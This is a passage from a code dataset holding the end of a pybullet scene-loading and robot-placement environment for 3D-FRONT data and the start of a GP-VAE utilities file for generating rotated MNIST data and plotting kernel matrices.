'linkJointAxis': [],\n\n 'physicsClientId': sim_id\n }\n\n # NOTE(ycho): Special handling for `floor` for facilitating free space sampling.\n # TODO(ycho): Remove this workaround after PR#3238 in the remote is merged.\n floor_vertices = np.empty((0, 3), dtype=np.float32)\n floor_face_indices = np.empty((0), dtype=np.int32)\n\n for r in room:\n room_id = r['instanceid']\n children = r['children']\n for c in children:\n ref = c['ref']\n\n def _lookup_cache(ref):\n \"\"\" Lookup collision shape from cache. \"\"\"\n if ref not in shape_map:\n return -1, -1\n return shape_map[ref]\n\n def _lookup_model(ref):\n \"\"\" Lookup collision shape from 3D-FUTURE models. \"\"\"\n if ref not in model_map:\n return -1, -1\n mid = model_map[ref]\n model_file = (model_dir / mid / 'raw_model.obj')\n\n # NOTE(ycho): Temporary workaround for degenerate model?\n # if '39057a21-0a68-3494-8522-2e473dd6a38f' in str(model_file):\n # return -1, -1\n\n if not model_file.exists():\n logging.warn('No such model file : {}'.format(model_file))\n return -1, -1\n # TODO(ycho): remove this flag ... only for visualization\n # or leave it in? idk...\n col_id = pb.createCollisionShape(\n pb.GEOM_MESH, fileName=str(model_file),\n meshScale=c['scale'],\n # flags=pb.GEOM_FORCE_CONCAVE_TRIMESH,\n physicsClientId=sim_id\n )\n vis_id = pb.createVisualShape(\n pb.GEOM_MESH, fileName=str(model_file),\n meshScale=c['scale'],\n flags=pb.GEOM_FORCE_CONCAVE_TRIMESH,\n physicsClientId=sim_id\n )\n return (col_id, vis_id)\n\n def _lookup_mesh(ref):\n \"\"\" Lookup collision shape from inline mesh \"\"\"\n if ref not in mesh_map:\n return -1, -1\n (vertices, face_indices) = mesh_map[ref]\n vertices = vertices.astype(np.float64).reshape(-1, 3)\n\n # FIXME(ycho): This is a hack to enable visualization\n # against pybullet issues with backface culling - i.e.\n # rendering the walls from the exterior through a window.\n face_indices = np.c_[\n face_indices,\n face_indices[..., ::-1]\n ]\n face_indices = face_indices.astype(np.int32).reshape(-1)\n col_id = pb.createCollisionShape(pb.GEOM_MESH,\n vertices=vertices,\n indices=face_indices,\n flags=pb.GEOM_FORCE_CONCAVE_TRIMESH,\n physicsClientId=sim_id)\n # NOTE(ycho): VisualShape is redundant for now.\n # vis_id = pb.createVisualShape(pb.GEOM_MESH,\n # vertices=vertices,\n # indices=face_indices,\n # flags=pb.GEOM_FORCE_CONCAVE_TRIMESH,\n # physicsClientId=sim_id)\n vis_id = -1\n return (col_id, vis_id)\n\n # NOTE(ycho): Special handling for `floor` for facilitating free space sampling.\n # TODO(ycho): Remove this workaround after PR#3238 in the remote is merged.\n if (ref in floor_set) and (ref in mesh_map):\n vertices, face_indices = mesh_map[ref]\n face_indices = face_indices.astype(np.int32).reshape(-1)\n R = np.reshape(pb.getMatrixFromQuaternion(c['rot']), (3, 3))\n floor_face_indices = np.r_[\n floor_face_indices, face_indices + len(floor_vertices)]\n floor_vertices = np.r_[\n floor_vertices, vertices @ R.T + c['pos']]\n continue\n\n # Loop through lookup methods until shape is found.\n col_id, vis_id = -1, -1\n for method in [_lookup_cache, _lookup_model, _lookup_mesh]:\n (col_id, vis_id) = method(ref)\n if col_id >= 0:\n break\n\n # Abort this entry if shape not found.\n if col_id < 0:\n continue\n\n # Cache any newly created shapes.\n if ref not in shape_map:\n shape_map[ref] = (col_id, vis_id)\n\n # NOTE(ycho):mass==0 indicates fixed body.\n kwargs['linkMasses'].append(0)\n kwargs['linkCollisionShapeIndices'].append(col_id)\n kwargs['linkVisualShapeIndices'].append(vis_id)\n kwargs['linkPositions'].append(c['pos'])\n kwargs['linkOrientations'].append(c['rot'])\n kwargs['linkInertialFramePositions'].append([0, 0, 0])\n kwargs['linkInertialFrameOrientations'].append([0, 0, 0, 1])\n kwargs['linkParentIndices'].append(0)\n kwargs['linkJointTypes'].append(pb.JOINT_FIXED)\n kwargs['linkJointAxis'].append([0, 0, 0])\n\n logging.info('# links = {}'.format(len(kwargs['linkMasses'])))\n\n # NOTE(ycho): Add special handling for floors.\n # NOTE(ycho): Remove this workaround after PR#3238 in the remote is merged.\n floor_col_id = pb.createCollisionShape(pb.GEOM_MESH,\n vertices=floor_vertices,\n indices=floor_face_indices,\n flags=pb.GEOM_FORCE_CONCAVE_TRIMESH,\n physicsClientId=sim_id)\n kwargs['baseCollisionShapeIndex'] = floor_col_id\n\n # NOTE(ycho): pybullet does not expose MAX_DEGREE_OF_FREEDOM\n # limit on the maximum number of links possible on the multibody,\n # so we duplicate the hardcoded constant here.\n kwargss = _split_multibody_kwargs(kwargs)\n # kwargss = [kwargss[1]]\n body_ids = [pb.createMultiBody(**kwargs) for kwargs in kwargss]\n print('body_ids = {}'.format(body_ids))\n\n for body_id in body_ids:\n # Finally, add texture information to the visual shapes.\n # NOTE(ycho): Texture can only be added in the post-processing step\n # through pb.changeVisualShape().\n tex_map = {}\n vis_data = pb.getVisualShapeData(body_id, physicsClientId=sim_id)\n for i, v in enumerate(vis_data):\n # Lookup mesh file.\n mesh_file = v[4].decode('utf-8')\n if not mesh_file:\n continue\n\n # Find texture file based on mesh file path.\n # NOTE(ycho): Relies on the dataset structure of 3DFRONT.\n texture_file = Path(mesh_file).parent / 'texture.png'\n if not texture_file.exists():\n logging.error(\n 'Texture file : {} does not exist!'.format(texture_file))\n continue\n\n # Deal with texture id caching logic ...\n tex_id = -1\n if texture_file not in tex_map:\n tex_map[texture_file] = pb.loadTexture(\n str(texture_file), physicsClientId=sim_id)\n tex_id = tex_map[texture_file]\n\n # Finally, add texture information to the link.\n pb.changeVisualShape(body_id, i,\n textureUniqueId=tex_id,\n physicsClientId=sim_id)\n return body_ids\n\n\n@dataclass\nclass ThreeDFrontEnvironmentSettings:\n model_dir: str\n scene_file: str = ''\n scene_dir: str = ''\n use_convex_collision: bool = True\n\n use_fast_aabb_in_placement: bool = True\n max_placement_iter: int = 256\n\n\nclass ThreeDFrontEnvironment(EnvironmentBase):\n def __init__(self, settings: ThreeDFrontEnvironmentSettings):\n self.settings_ = settings\n self.env_ids_ = []\n self.sim_id_ = -1\n\n @property\n def sim_id(self):\n return self.sim_id_\n\n def reset(self, sim_id: int):\n self.sim_id_ = sim_id\n\n # Fetch or lookup scene file to instantiate.\n scene_file = ''\n if self.settings_.scene_file:\n scene_file = self.settings_.scene_file\n else:\n if self.settings_.scene_dir:\n # convenient shorthand.\n d = self.settings_.scene_dir\n scene_file = Path(d)/random.choice(os.listdir(d))\n scene_file = Path(scene_file)\n logging.info('Loading scene file = {}'.format(scene_file))\n if not scene_file.is_file():\n logging.error('Scene file : {} does not exist!'.format(scene_file))\n return\n\n # Load the scene.\n self.env_ids_ = _load_tdf_scene(str(scene_file),\n self.settings_.model_dir, sim_id,\n self.settings_.use_convex_collision)\n\n def place(self, robot_id: int):\n # TODO(ycho): Consider exposing this parameter.\n EPS = 1e-3\n\n robot_pose = pb.getBasePositionAndOrientation(robot_id,\n physicsClientId=self.sim_id)\n old_pos = robot_pose[0]\n old_rot = robot_pose[1]\n old_z = old_pos[2]\n\n floor_aabb = np.asarray(pb.getAABB(\n self.env_ids_[0], -1, physicsClientId=self.sim_id), dtype=np.float32)\n robot_aabb = debug_get_full_aabb(self.sim_id, robot_id)\n robot_size = robot_aabb[1] - robot_aabb[0]\n\n # NOTE(ycho): Shrink the sampled space by the robot radius.\n pos_min = floor_aabb[0, :2] + 0.5 * robot_size[:2]\n pos_max = floor_aabb[1, :2] - 0.5 * robot_size[:2]\n\n for i in range(self.settings_.max_placement_iter):\n logging.debug('Placement {}/{}'.format(i,\n self.settings_.max_placement_iter))\n # Sample X-Y position from floor AABB.\n x, y = np.random.uniform(pos_min, pos_max)\n\n # Cast ray from robot top -> floor.\n ray_src = [x, y, floor_aabb[1, 2] +\n robot_aabb[1, 2] - robot_aabb[0, 2]]\n ray_dst = [x, y, floor_aabb[0, 2] - EPS]\n ray_res = pb.rayTest(ray_src, ray_dst, physicsClientId=self.sim_id)\n\n # If by some magic, multiple intersections happened,\n # ignore this case.\n if len(ray_res) != 1:\n continue\n ray_res = ray_res[0]\n\n # The ray must hit env + floor.\n if (ray_res[0] != self.env_ids_[0]) or (ray_res[1] != -1):\n continue\n\n # Complete the desired new position.\n # new_z = floor_aabb[1, 2] + (old_z - robot_aabb[0, 2])\n new_z = floor_aabb[1, 2] + (old_z - robot_aabb[0, 2])\n new_pos = np.asarray([x, y, new_z + EPS], dtype=np.float32)\n new_rot = old_rot\n # NOTE(ycho): Alternatively, sample from a random SE2 orientation:\n # new_rot = pb.getQuaternionFromEuler([0.0, 0.0, np.random.uniform(-np.pi, np.pi)])\n\n # Reject the new position if it collides with existing objects.\n if self.settings_.use_fast_aabb_in_placement:\n # NOTE(ycho): This query is conservative, so the returned objects\n # may not actually overlap with the robot. However,\n # perhaps if the object is close enough to the robot that we should\n new_aabb = robot_aabb + new_pos - old_pos\n o = pb.getOverlappingObjects(new_aabb[0], new_aabb[1],\n physicsClientId=self.sim_id)\n if o is not None:\n continue\n\n pb.resetBasePositionAndOrientation(robot_id,\n new_pos,\n new_rot,\n physicsClientId=self.sim_id)\n break\n else:\n # Actually place the robot where it would go,\n # and then check if it results in a collision.\n # Try placing the robot here now ...\n # NOTE(ycho): Since pybullet uses a default collision margin (0.04 I think?),\n # even this may be a little bit more conservative than the actual collision.\n pb.resetBasePositionAndOrientation(robot_id,\n new_pos,\n new_rot,\n physicsClientId=self.sim_id)\n col = False\n for env_id in self.env_ids_:\n cpts = pb.getClosestPoints(env_id, robot_id,\n np.inf,\n physicsClientId=self.sim_id)\n for cpt in cpts:\n if cpt[8] < 0:\n col = True\n break\n # Early exit if collision found\n if col:\n break\n # Continue searching if collision found\n if col:\n continue\n\n # All is well! break.\n break\n","repo_name":"iMSquared/imm_sim","sub_path":"src/imm/sim/env/three_d_front_env.py","file_name":"three_d_front_env.py","file_ext":"py","file_size_in_byte":17389,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"32040966699","text":"import tensorflow as tf\r\nimport tensorflow_probability as tfp\r\nfrom tensorflow.python.ops import math_ops as tfmath_ops\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nfrom datetime import datetime as dt\r\nimport glob\r\nfrom matplotlib.patches import Ellipse\r\nimport shutil\r\nimport pandas as pd\r\nimport pickle\r\nimport time\r\nimport subprocess as sp\r\nimport math\r\n\r\n\r\nimport random\r\nfrom sklearn.decomposition import PCA\r\nfrom scipy import ndimage\r\nimport scipy\r\nimport seaborn as sns\r\n\r\ntfk = tfp.math.psd_kernels\r\n\r\n\r\ndef make_checkpoint_folder(base_dir, expid=None, extra=\"\"):\r\n \"\"\"\r\n Makes a folder and sub folders for pics and results\r\n Args:\r\n base_dir: the root directory where new folder will be made\r\n expid: optional extra sub dir inside base_dir\r\n \"\"\"\r\n\r\n # make a \"root\" dir to store all checkpoints\r\n # homedir = os.getenv(\"HOME\")\r\n # base_dir = homedir+\"/GPVAE_checkpoints/\"\r\n\r\n if expid is not None:\r\n base_dir = base_dir + \"/\" + expid + \"/\"\r\n\r\n if not os.path.exists(base_dir):\r\n os.makedirs(base_dir)\r\n \r\n # now make a unique folder inside the root for this experiments\r\n filenum = str(len(os.listdir(base_dir))) + \"_\"+extra+\"__on__\"\r\n\r\n T = dt.now()\r\n\r\n filetime = str(T.day)+\"_\"+str(T.month)+\"_\"+str(T.year) + \"__at__\"\r\n filetime += str(T.hour)+\"_\"+str(T.minute)+\"_\"+str(T.second)\r\n\r\n # main folder\r\n checkpoint_folder = base_dir + filenum + filetime\r\n os.makedirs(checkpoint_folder)\r\n\r\n # pictures folder\r\n pic_folder = checkpoint_folder + \"/pics/\"\r\n os.makedirs(pic_folder)\r\n\r\n # pickled results files\r\n res_folder = checkpoint_folder + \"/res/\"\r\n os.makedirs(res_folder)\r\n\r\n # source code\r\n src_folder = checkpoint_folder + \"/sourcecode/\"\r\n os.makedirs(src_folder)\r\n old_src_dir = os.path.dirname(os.path.abspath(__file__)) + \"/\"\r\n src_files = os.listdir(old_src_dir)\r\n print(\"\\n\\nCopying source Code to \"+src_folder)\r\n for f in src_files:\r\n if \".py\" in f:\r\n src_file = old_src_dir + f\r\n shutil.copy2(src_file, src_folder)\r\n print(src_file)\r\n print(\"\\n\")\r\n\r\n # predictions folder, for plotting purposes\r\n preds_folder = checkpoint_folder + \"/preds/\"\r\n os.makedirs(preds_folder)\r\n\r\n \r\n return checkpoint_folder + \"/\"\r\n\r\n\r\nclass pandas_res_saver:\r\n \"\"\"\r\n Takes a file and a list of col names to initialise a\r\n pandas array. Then accepts extra rows to be added\r\n and occasionally written to disc.\r\n \"\"\"\r\n def __init__(self, res_file, colnames):\r\n # reload old results frame\r\n if os.path.exists(res_file):\r\n if list(pd.read_pickle(res_file).columns)==colnames:\r\n print(\"res_file: recovered \")\r\n self.data = pd.read_pickle(res_file)\r\n self.res_file = res_file\r\n else:\r\n print(\"res_file: old exists but not same, making new \")\r\n self.res_file = res_file + \"_\" + str(time.time())\r\n self.data = pd.DataFrame(columns=colnames)\r\n else:\r\n print(\"res_file: new\")\r\n self.res_file = res_file\r\n self.data = pd.DataFrame(columns=colnames)\r\n \r\n self.ncols = len(colnames)\r\n self.colnames = colnames\r\n \r\n def __call__(self, new_data, n_steps=10):\r\n new_data = np.asarray(new_data).reshape((-1, self.ncols))\r\n new_data = pd.DataFrame(new_data, columns=self.colnames)\r\n self.data = pd.concat([self.data, new_data])\r\n\r\n if self.data.shape[0]%n_steps == 0:\r\n self.data.to_pickle(self.res_file)\r\n print(\"Saved results to file: \"+self.res_file)\r\n\r\n\r\ndef gauss_cross_entropy(mu1, var1, mu2, var2):\r\n \"\"\"\r\n Computes the element-wise cross entropy\r\n Given q(z) ~ N(z| mu1, var1)\r\n returns E_q[ log N(z| mu2, var2) ]\r\n args:\r\n mu1: mean of expectation (batch, tmax, 2) tf variable\r\n var1: var of expectation (batch, tmax, 2) tf variable\r\n mu2: mean of integrand (batch, tmax, 2) tf variable\r\n var2: var of integrand (batch, tmax, 2) tf variable\r\n returns:\r\n cross_entropy: (batch, tmax, 2) tf variable\r\n \"\"\"\r\n\r\n term0 = 1.8378770664093453 # log(2*pi)\r\n term1 = tf.log(var2)\r\n term2 = (var1 + mu1 ** 2 - 2 * mu1 * mu2 + mu2 ** 2) / var2\r\n\r\n cross_entropy = -0.5 * (term0 + term1 + term2)\r\n\r\n return cross_entropy\r\n \r\n\r\ndef generate_rotated_MNIST(save_path, N=400, nr_angles=16, valid_set_size=0.1, drop_rate=0.25, digits=[3, 6],\r\n latent_dim_object_vector=8, shuffle_data=True, seed=0):\r\n \"\"\"\r\n Generate rotated MNIST data from Casale's paper.\r\n\r\n Saves train, validation and test sets as pickle files.\r\n Each dataset is a Pyhton dictionary with keys: ['images', 'auxiliary data'].\r\n Auxiliary data consists of image id, rotation angle and PCA embedding vector.\r\n\r\n :param save_path: path for saving the generated data\r\n :param N: number of MNIST images of specified digits to use\r\n :param nr_angles: number of angles between [0, 2pi) considered\r\n :param valid_set_size: size of validation set\r\n :param drop_rate: how much images to drop\r\n :param digit: which digit to consider\r\n :param shuffle_data: whether or not to shuffle data. Might be important since if we pass\r\n all angles of the same digit in same batch, kernel matrices carry more information that model could exploit.\r\n Note that for Michael's extrapolatingGPVAE idea, data should not be shuffled, since there independent GPs are\r\n fitted for each image.\r\n :param latent_dim_object_vector: dimension of latent dimension of object vectors\r\n :param seed: random seed, for reproducibility\r\n \"\"\"\r\n\r\n random.seed(seed)\r\n angles = np.linspace(0, 360, nr_angles + 1)[:-1]\r\n\r\n # load MNIST data\r\n (x_train, y_train), (_, _) = tf.keras.datasets.mnist.load_data()\r\n\r\n # Rescale the images from [0,255] to the [0.0,1.0] range.\r\n x_train = x_train[..., np.newaxis] / 255.0\r\n\r\n # TODO: should MNIST images be binarized here?\r\n\r\n # filter out images with correct digit\r\n digits_df = []\r\n for digit in digits:\r\n x_train_digit = x_train[(y_train == digit)]\r\n print('Number of images with digit {}: {}'.format(digit, len(x_train_digit)))\r\n\r\n # subsample N images\r\n indices = random.sample(list(range(x_train_digit.shape[0])), N)\r\n digits_df.append(x_train_digit[indices, :, :, 0]) # (N, 28, 28)\r\n\r\n x_train = np.concatenate(digits_df)\r\n\r\n # PCA\r\n pca_df = x_train.copy().reshape((x_train.shape[0], -1))\r\n pca = PCA(n_components=latent_dim_object_vector)\r\n pca_df = pca.fit_transform(pca_df)\r\n print(\"Explained variance ratio PCA: {}\".format(pca.explained_variance_ratio_))\r\n\r\n # save pca_df to pickle (for init of object vectors)\r\n digit_ending = \"\".join([str(x) for x in digits])\r\n with open(save_path + 'pca_ov_init{}_{}.p'.format(digit_ending, latent_dim_object_vector), 'wb') as ov_init_pickle:\r\n pickle.dump(pca_df, ov_init_pickle)\r\n\r\n # rotate images\r\n def rotate_image(image, image_id, angles, pca_embedding):\r\n images = []\r\n\r\n aux_data = np.array([tuple([image_id, math.radians(angle)] + list(pca_embedding)) for angle in angles])\r\n\r\n for i in range(len(angles)):\r\n images.append(ndimage.rotate(image, angles[i], reshape=False))\r\n\r\n images = np.stack(images)\r\n images = images[..., np.newaxis]\r\n\r\n return images, aux_data\r\n\r\n images, aux_data = [], []\r\n\r\n assert len(digits) * N == x_train.shape[0]\r\n for i in range(len(digits) * N):\r\n images_rot, aux_data_i = rotate_image(x_train[i, :, :], i, angles, pca_df[i, :].copy())\r\n images.append(images_rot)\r\n aux_data.append(aux_data_i)\r\n\r\n images = np.concatenate(images) # (N * len(angles), 28, 28, 1)\r\n aux_data = np.concatenate(aux_data) # (N * len(angles), 10)\r\n\r\n # train/test and eval split\r\n images_, aux_data_, eval_images_, eval_aux_data_ = [], [], [], []\r\n N_digit = int(len(images) / len(digits))\r\n N_eval = int(N_digit * (1 - valid_set_size))\r\n for i in range(len(digits)):\r\n images_.append(images[i * N_digit:i * N_digit + N_eval])\r\n aux_data_.append(aux_data[i * N_digit:i * N_digit + N_eval])\r\n eval_images_.append(images[i * N_digit + N_eval:(i + 1) * N_digit])\r\n eval_aux_data_.append(aux_data[i * N_digit + N_eval:(i + 1) * N_digit])\r\n\r\n images, aux_data, eval_images, eval_aux_data = np.concatenate(images_), np.concatenate(aux_data_), \\\r\n np.concatenate(eval_images_), np.concatenate(eval_aux_data_)\r\n\r\n # shuffle eval data\r\n if shuffle_data:\r\n eval_idx = random.sample(list(range(len(eval_images))), len(eval_images))\r\n eval_images, eval_aux_data = eval_images[eval_idx], eval_aux_data[eval_idx]\r\n\r\n # train and test split\r\n test_angle = random.sample(list(angles), 1)[0]\r\n mask = (aux_data[:, 1] == math.radians(test_angle))\r\n train_images, train_aux_data, test_images, test_aux_data = images[~mask], aux_data[~mask], \\\r\n images[mask], aux_data[mask]\r\n print(\"Test angle: {}\".format(test_angle))\r\n\r\n # drop some images\r\n if shuffle_data:\r\n idx_train = random.sample(list(range(len(train_images))), int(len(train_images) * (1 - drop_rate)))\r\n idx_test = random.sample(list(range(len(test_images))), int(len(test_images) * (1 - drop_rate)))\r\n else:\r\n idx_train = list(range(int(len(train_images) * (1 - drop_rate))))\r\n idx_test = list(range(int(len(test_images) * (1 - drop_rate))))\r\n\r\n idx_train_not_in_test = list(range(int(len(train_images) * (1 - drop_rate)), len(train_images)))\r\n train_not_in_test_images = train_images[idx_train_not_in_test]\r\n train_not_in_test_aux_data = train_aux_data[idx_train_not_in_test]\r\n\r\n train_images, train_aux_data = train_images[idx_train], train_aux_data[idx_train]\r\n test_images, test_aux_data = test_images[idx_test], test_aux_data[idx_test]\r\n\r\n print('Size of training data: {}'.format(len(train_images)))\r\n print('Size of validation data: {}'.format(len(eval_images)))\r\n print('Size of test data: {}'.format(len(test_images)))\r\n\r\n if not shuffle_data:\r\n print('Size of training data without test ids: {}'.format(len(train_not_in_test_images)))\r\n\r\n # save to pickle files\r\n train_dict = {'images': train_images, 'aux_data': train_aux_data}\r\n eval_dict = {'images': eval_images, 'aux_data': eval_aux_data}\r\n test_dict = {'images': test_images, 'aux_data': test_aux_data}\r\n\r\n if not shuffle_data:\r\n train_not_in_test_dict = {'images': train_not_in_test_images, 'aux_data': train_not_in_test_aux_data}\r\n\r\n ending = \"_not_shuffled_{}.p\".format(latent_dim_object_vector) if not shuffle_data else \"_{}.p\".format(latent_dim_object_vector)\r\n ending = digit_ending + ending\r\n print(ending)\r\n\r\n with open(save_path + 'train_data' + ending, 'wb') as train_pickle:\r\n pickle.dump(train_dict, train_pickle)\r\n with open(save_path + 'eval_data' + ending, 'wb') as eval_pickle:\r\n pickle.dump(eval_dict, eval_pickle)\r\n with open(save_path + 'test_data' + ending, 'wb') as test_pickle:\r\n pickle.dump(test_dict, test_pickle)\r\n\r\n if not shuffle_data:\r\n with open(save_path + 'train_not_in_test_data' + ending, 'wb') as train_pickle:\r\n pickle.dump(train_not_in_test_dict, train_pickle)\r\n\r\n\r\ndef plot_mnist(arr, recon_arr, title, nr_images=8, seed=0):\r\n \"\"\"\r\n\r\n :param arr:\r\n :param recon_arr:\r\n :param title:\r\n :param nr_images:\r\n :param seed:\r\n :return:\r\n \"\"\"\r\n random.seed(seed)\r\n assert nr_images % 8 == 0\r\n\r\n indices = random.sample(list(range(len(arr))), nr_images)\r\n plt.figure(figsize=(10, 10*int(nr_images/8)))\r\n plt.suptitle(title)\r\n for i in range(int(nr_images*2)):\r\n plt.subplot(int(nr_images / 2), 4, i + 1)\r\n plt.xticks([])\r\n plt.yticks([])\r\n plt.grid(False)\r\n if i % 2 == 0:\r\n plt.imshow(arr[indices[i // 2]][:, :, 0], cmap='gray')\r\n plt.xlabel(\"Ground truth, id: {}\".format(indices[i // 2]))\r\n else:\r\n plt.imshow(recon_arr[indices[i // 2]][:, :, 0], cmap='gray')\r\n plt.xlabel(\"Recon image, id: {}\".format(indices[i // 2]))\r\n # plt.tight_layout()\r\n plt.draw()\r\n\r\n\r\ndef visualize_kernel_matrices(aux_data_arr, batch_size=32, N=1, K_obj_normalized=True,\r\n amplitude=1.0, length_scale=1.0):\r\n \"\"\"\r\n Visualize heatmaps of kernel matrices.\r\n\r\n :param aux_data_arr:\r\n :param batch_size:\r\n :param N: number of batches to visualize\r\n :param K_obj_normalized: whether or not to normalize (between -1 and 1) object kernel matrix (linear kernel)\r\n :param amplitude:\r\n :param length_scale:\r\n \"\"\"\r\n\r\n # define kernels\r\n kernel_view = tfk.ExpSinSquared(amplitude=amplitude, length_scale=length_scale, period=2 * np.pi)\r\n kernel_object = tfk.Linear()\r\n x = tf.placeholder(dtype=tf.float32)\r\n y = tf.placeholder(dtype=tf.float32)\r\n z = tf.placeholder(dtype=tf.float32)\r\n w = tf.placeholder(dtype=tf.float32)\r\n K_view = kernel_view.matrix(tf.expand_dims(x, axis=1), tf.expand_dims(y, axis=1))\r\n K_obj = kernel_object.matrix(z, w)\r\n if K_obj_normalized:\r\n obj_norm = 1 / tf.matmul(tf.math.reduce_euclidean_norm(z, axis=1, keepdims=True),\r\n tf.transpose(tf.math.reduce_euclidean_norm(z, axis=1, keepdims=True), perm=[1, 0]))\r\n K_obj = K_obj * obj_norm\r\n K_prod = K_view * K_obj\r\n\r\n # util function for heatmaps\r\n def heatmap(ax_, arr, title, vmin=0, vmax=1):\r\n ax = sns.heatmap(arr, vmin=vmin, vmax=vmax, center=0,\r\n cmap=sns.diverging_palette(20, 220, n=200),\r\n square=True, ax=ax_)\r\n ax.set_xticklabels(ax.get_xticklabels(),\r\n rotation=45,\r\n horizontalalignment='right')\r\n ax.set_title(title);\r\n\r\n for i in range(N):\r\n # generate kernel matrices\r\n batch = aux_data_arr[i * batch_size:(i + 1) * batch_size]\r\n with tf.Session() as sess:\r\n K_view_, K_obj_, K_prod_ = sess.run([K_view, K_obj, K_prod],\r\n {x: batch[:, 1], y: batch[:, 1], z: batch[:, 2:], w: batch[:, 2:]})\r\n # plot kernel matrices\r\n fig, axes = plt.subplots(nrows=1, ncols=3, figsize=(20, 5))\r\n heatmap(axes[0], K_view_, \"View kernel. Batch: {}. Det: {}\".format(i + 1, np.linalg.det(K_view_)))\r\n heatmap(axes[1], K_obj_, \"Object kernel. Batch: {}. Det: {}\".format(i + 1, np.linalg.det(K_obj_)), vmin=-1)\r\n heatmap(axes[2], K_prod_, \"Product kernel. Batch: {}. Det: {}\".format(i + 1, np.linalg.det(K_prod_)), vmin=-1)\r\n plt.show()\r\n\r\n\r\ndef import_rotated_mnist(MNIST_path, ending, batch_size, digits=\"3\", N_t=None):\r\n \"\"\"\r\n\r\n Support for loading of data and batching via tf.data.Dataset API.\r\n\r\n :param MNIST_path:\r\n :param ending:\r\n :param batch_size:\r\n :param N_t: How many angels in train set for each image in test set\r\n (since reGPVAE implementation is based on not_shuffled data).\r\n\r\n :return:\r\n \"\"\"\r\n\r\n # TODO: here we load entire data in the memory. For MNIST that is fine, for larger datasets will have to\r\n # implement it in more efficient way\r\n\r\n # train data\r\n train_data_dict = pickle.load(open(MNIST_path + 'train_data' + ending, 'rb'))\r\n if N_t is not None:\r\n flatten = lambda l: [item for sublist in l for item in sublist]\r\n digit_mask = [True] * N_t + [False] * (15 - N_t)\r\n\r\n mask = [random.sample(digit_mask, len(digit_mask)) for _ in range(int(len(train_data_dict['aux_data'])/15))]\r\n mask = flatten(mask)\r\n train_data_dict['images'] = train_data_dict['images'][mask]\r\n train_data_dict['aux_data'] = train_data_dict['aux_data'][mask]\r\n\r\n # add train images without test angles\r\n if N_t < 15:\r\n train_not_in_test_data_dict = pickle.load(open(MNIST_path + 'train_not_in_test_data' + ending, 'rb'))\r\n\r\n n = int(len(digits) * 270 * (15 - N_t) / N_t) * N_t\r\n\r\n mask = [random.sample(digit_mask, len(digit_mask)) for _ in range(int(len(train_not_in_test_data_dict['aux_data']) / 15))]\r\n mask = flatten(mask)\r\n\r\n train_data_dict['images'] = np.concatenate((train_data_dict['images'],\r\n train_not_in_test_data_dict['images'][mask][:n, ]), axis=0)\r\n train_data_dict['aux_data'] = np.concatenate((train_data_dict['aux_data'],\r\n train_not_in_test_data_dict['aux_data'][mask][:n, ]), axis=0)\r\n\r\n train_data_images = tf.data.Dataset.from_tensor_slices(train_data_dict['images'])\r\n train_data_aux_data = tf.data.Dataset.from_tensor_slices(train_data_dict['aux_data'])\r\n train_data = tf.data.Dataset.zip((train_data_images, train_data_aux_data)).batch(batch_size)\r\n\r\n # eval data\r\n eval_batch_size_placeholder = tf.compat.v1.placeholder(dtype=tf.int64, shape=())\r\n eval_data_dict = pickle.load(open(MNIST_path + 'eval_data' + ending, 'rb'))\r\n eval_data_images = tf.data.Dataset.from_tensor_slices(eval_data_dict['images'])\r\n eval_data_aux_data = tf.data.Dataset.from_tensor_slices(eval_data_dict['aux_data'])\r\n eval_data = tf.data.Dataset.zip((eval_data_images, eval_data_aux_data)).batch(eval_batch_size_placeholder)\r\n\r\n # test data\r\n test_batch_size_placeholder = tf.compat.v1.placeholder(dtype=tf.int64, shape=())\r\n test_data_dict = pickle.load(open(MNIST_path + 'test_data' + ending, 'rb'))\r\n test_data_images = tf.data.Dataset.from_tensor_slices(test_data_dict['images'])\r\n test_data_aux_data = tf.data.Dataset.from_tensor_slices(test_data_dict['aux_data'])\r\n test_data = tf.data.Dataset.zip((test_data_images, test_data_aux_data)).batch(test_batch_size_placeholder)\r\n\r\n # init iterator\r\n iterator = tf.data.Iterator.from_structure(train_data.output_types, train_data.output_shapes)\r\n training_init_op = iterator.make_initializer(train_data)\r\n eval_init_op = iterator.make_initializer(eval_data)\r\n test_init_op = iterator.make_initializer(test_data)\r\n\r\n return iterator, training_init_op, eval_init_op, test_init_op, \\\r\n train_data_dict, eval_data_dict, test_data_dict, eval_batch_size_placeholder, test_batch_size_placeholder\r\n\r\n\r\ndef print_trainable_vars(vars):\r\n total_parameters = 0\r\n print(\"\\n\\nTrainable variables:\")\r\n for v in vars:\r\n print(v)\r\n shape = v.get_shape()\r\n var_params = 1\r\n for dim in shape:\r\n var_params *= dim.value\r\n total_parameters += var_params\r\n print(\"Number of train params: {}\".format(total_parameters))\r\n\r\n\r\ndef latent_samples_VAE_full_train(train_images, vae, clipping_qs=False):\r\n \"\"\"\r\n Get latent samples for training data. For t-SNE plots :)\r\n\r\n :param train_images:\r\n :param vae:\r\n :param clipping_qs:\r\n :return:\r\n \"\"\"\r\n\r\n # ENCODER NETWORK\r\n qnet_mu, qnet_var = vae.encode(train_images)\r\n\r\n # clipping of VAE posterior variance\r\n if clipping_qs:\r\n qnet_var = tf.clip_by_value(qnet_var, 1e-3, 10)\r\n\r\n # SAMPLE\r\n epsilon = tf.random.normal(shape=tf.shape(qnet_mu), dtype=vae.dtype)\r\n latent_samples = qnet_mu + epsilon * tf.sqrt(qnet_var)\r\n\r\n return latent_samples\r\n\r\n\r\nif __name__==\"__main__\":\r\n\r\n # generate_init_inducing_points(\"MNIST data/train_data3.p\", PCA=False)\r\n\r\n # ============= generating rotated MNIST data =============\r\n # generate_rotated_MNIST(\"MNIST data/\", digits=[3, 6])\r\n # generate_rotated_MNIST(\"MNIST data/\", digits=[1, 3, 6, 7, 9])\r\n # generate_rotated_MNIST(\"MNIST data/\")\r\n # generate_rotated_MNIST('MNIST data/', shuffle_data=False, digits=[6])\r\n # generate_rotated_MNIST('MNIST data/', shuffle_data=False, digits=[3])\r\n # generate_rotated_MNIST('MNIST data/', shuffle_data=False, digits=[3, 6])\r\n # generate_rotated_MNIST('MNIST data/', shuffle_data=False, digits=[1, 3, 6, 7, 9])\r\n # generate_rotated_MNIST('MNIST data/', shuffle_data=True, digits=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\r\n # generate_rotated_MNIST('MNIST data/', shuffle_data=False, digits=[0, 1, 2, 3, 4, 5, 6, 7, 8, 